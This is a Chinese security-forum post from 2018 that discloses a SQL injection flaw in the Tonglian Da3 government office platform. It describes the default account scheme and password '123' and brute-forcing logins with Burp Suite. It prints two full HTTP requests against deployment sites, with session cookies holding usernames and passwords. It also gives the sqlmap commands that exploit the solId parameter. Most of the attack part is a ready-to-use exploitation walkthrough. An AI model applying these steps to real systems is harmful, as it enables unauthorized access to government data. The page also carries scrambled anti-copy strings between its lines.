找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1350|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

' B& ^: y- A, ^% V, a$ ~3 t# ~
6 v# w- ?. }6 \; e& N

/ Y1 i- p5 V! h; M v

1 D9 x" S' u7 ?) g5 a& u 平台简介: ; l0 \0 E; P7 X" i, }4 b. B

; Q; A2 A, k+ w# z: J8 A% v

& \" E& K0 g. r2 j0 t   0 v: g) ]3 x: Y$ {( p5 y4 ~

3 H8 b7 G0 M2 G R* C, P) Q

0 K; j. ]- Z- H$ p; O3 N9 d6 \, d1 ] 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
, B0 T( w: b' P0 E) i9 B3 \同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
* D: [+ c! V. o: v: H& R, e( v, f 同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献! & x7 H0 k# }! h2 Y9 t0 o7 G; W

" \$ ], a+ A! V. ?4 W. g7 k

1 U0 l( T8 V/ B/ D7 n- f   " }: `/ J& q" `

1 ~/ V# D, } d& P5 ?2 R

: d+ b X! R% f9 L 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址: 0 ` m% D8 G3 d+ H# c( \

1 [, g. K8 m1 Z t6 b5 N

3 ?: V: l5 b7 N   $ u" a) [, E% p* {# k/ L& M" f

9 B; C% t) _7 M+ \

$ u7 e9 t7 O7 j, g8 M9 o http://1.1.1.1:7197/cap-aco/#(案例2-)5 L3 u1 D; \5 Q& U( c

7 n* a1 x$ F( j6 O0 P g8 R3 m( V

- E. p7 ]+ {7 s1 {; d http://www.XXOO.com (案例1-官网网站) 2 E3 J* ^/ y( S3 O3 H7 U Q* n

" U7 i# c4 N: P& f0 h+ P

% b6 i/ S' l/ Y% [$ \   $ D/ j% I- ~: z2 }: V% G

# h; t( g7 m6 }8 A

- V6 t( P! G8 A 漏洞详情:1 q( }& v2 N$ C2 @8 ]$ G

9 d2 K6 a- w9 m" c- D

) z% M9 W! a5 C$ b# _& b  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 8 ~; O0 l& H; q

3 m7 P* _2 @* h" C6 k, `% [

4 `/ _7 L+ G& r) J' m      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:6 n) u4 S: [( [

+ Q% ]% a6 _1 I$ B0 `7 b

2 C8 Y6 Y0 o. C! F4 ?  ( j9 _1 F& W1 r# O

7 B# _2 D5 P* ~

' l3 `; F7 t3 l$ v   $ o' P8 Q9 g4 f7 Z4 A5 F! {

* A' w( o5 E% f9 h

7 ]* ]9 ?7 P; g( p a2 ^' m5 s status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:, U6 p7 {( U8 t9 \8 N' M. U; ^

. y7 @. k8 E" a& V) W; _6 \4 Z

: p- r$ t C( p1 G& I6 j 1、案例1-官方网站 , w# b) m) w! ?$ W' w- W. @( P

M2 K% J6 F5 s3 W2 e) x

- o5 O4 Z* R: Z$ E' Y+ k GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1 # j- t- l$ t+ [. F! n

& l) Q% [- j+ v) m" i

4 L7 s8 b( c: q5 d X! D Host: www.XXOO.com2 v' ?6 c j4 P! n; @" o

, E: D+ X8 K P

5 u( o b7 p# `" g# s8 ] Proxy-Connection: Keep-Alive( P) p" r& B2 f

( y0 S9 B9 h j! K

: M& j) y/ o% b Accept: application/json, text/javascript, */*; q=0.01" l4 J: z5 n- _: o% h7 |8 |4 Q: I

5 q, r( t: E/ u( l6 |

8 t4 R! k, q1 @ Accept-Language: zh-CN/ j1 H, K/ \! c; z2 b5 V, {

; m" a; w; b9 X2 X8 x- t

# m4 c- M* l( h7 @: P Content-Type: application/json ) l4 |, `' w# m

% l0 \, J: V3 b0 j! U# \1 t5 c

, C l# L& o% I* j% ]- D' L; ? User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko 3 a8 Q' I, o# f

+ `4 U! j' y% K

9 P" |; T7 r9 a) P0 P3 U) o X-Requested-With: XMLHttpRequest6 v; I% A8 Z; L& R, O

# o, {2 @. ~3 _0 V

. U5 `: D$ q1 V" q& U Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002 - C! A. ~ w3 B( j' C+ j0 S" {# x

! x- q1 K/ f, B' `

4 A& }: k4 y$ \5 }0 Y1 u8 P1 e Accept-Encoding: gzip, deflate, sdch% [3 T( B8 E7 ] w) q

: H; R8 B/ |+ A0 [( u2 |! I

: [2 q+ B" _, K" N9 Y2 r Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e4 H, P; q) ^3 H. U6 i |. [8 v/ K, o5 `

' J6 U' z: a$ k5 b* _* Q

r0 o: A! ^3 F% I) v3 A 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: ' u. h; g' U* e& J2 Y

' k) A5 {( S$ V5 X: d. \$ F6 g8 l

j, v7 N# r# T- s2 ?. Y6 O+ r, p% ~   + ^- {5 v. K* ?( t

2 z0 R/ t8 j. ?8 H# F& Y& {9 M

, @$ e. }; c8 s9 i7 f `0 d' Z: C! v   7 ]5 a) }6 z$ J8 `

# C9 r: c( ^" f7 T

( g) V( V! T+ O  8 i9 V3 q. r; L& U5 ?- V

) @2 `' S w( ^2 {* [

5 R1 W* K: u+ K6 Z+ F% v. G   % u) u. |, g/ D9 F) V

# L- X' w7 E9 b7 q' ` S

8 z9 w% L0 Z4 c5 K   0 m* ^4 G* d0 X, p- d

, u) a& ^8 ]% E5 U* H# s7 v; }/ {8 l

* l" p/ x" p! }! x/ q# r7 P% T. D 2、案例2-某天河云平台" W* V. M' I# z' T5 W9 S

( N. f( w1 k4 L: @; o" Z

" l" m+ Q/ |" H GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1# Z( ^. M& V# Y. ~2 N

# v, {$ n3 s, U# T: f& i

l* v+ U# O$ e5 ?8 u, ^ Host: 1.1.1.:7197$ m j1 h9 r" s- G% ^& x' R+ s

; l/ B5 F% o/ k* `/ C

9 U6 h2 Q+ x6 J+ h5 a& K Accept: application/json, text/javascript, */*; q=0.017 H' q& P: v! d% M3 l/ k

, c0 m8 W5 G; ~$ y

: {2 l5 |8 i% y- ~5 g) e! Y0 d" r X-Requested-With: XMLHttpRequest6 j& ?. p- \) w6 X8 B

% ?9 k$ m# S" d% S. K( V9 V

& y- k" o% Z; v* N- ?: ] User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 8 \. H2 P9 L$ R* s4 E0 l

+ c# _( _) U5 ] m# V [/ {- n

. B# K2 ^6 P* W6 \2 f2 G; ~. x, f Content-Type: application/json ( i7 f) v9 A) V* o- p

/ E, J1 v. \0 F7 R$ ^. H* e

% g6 ]$ W0 N0 i9 R+ e Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=10087 o7 [2 [/ V0 i1 T

5 v! c/ W* c: r# M

: q$ z8 v' C$ u Accept-Language: zh-CN,zh;q=0.8 7 Z; N6 ]9 ~5 }% O- ]

/ I* G2 `/ C0 ~; a4 R* ~

7 R1 |& S# O9 H5 c Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=10 d, f8 d3 Q9 e: N- h. z! n

3 ]. \# w% `8 l r [5 a

4 q, M7 s- {% M* o7 E Connection: close 9 _" P2 K: K" y0 `2 L

; W* C2 w4 @- |% W! g: D

+ @ O! v" G2 s0 {+ S 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:* R1 }# e+ Z% T {1 v2 J

3 z" Y$ g3 q! g0 h

: w5 ?% u u5 ~' O. ~( @. [ E1 y0 j# h   ' e$ {' {2 W. T# Z5 I

% M6 T! O3 j& p6 i% C, ~

" A8 [! r! [4 O5 K6 z8 h1 o
3 F# G0 s8 g+ a: I

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表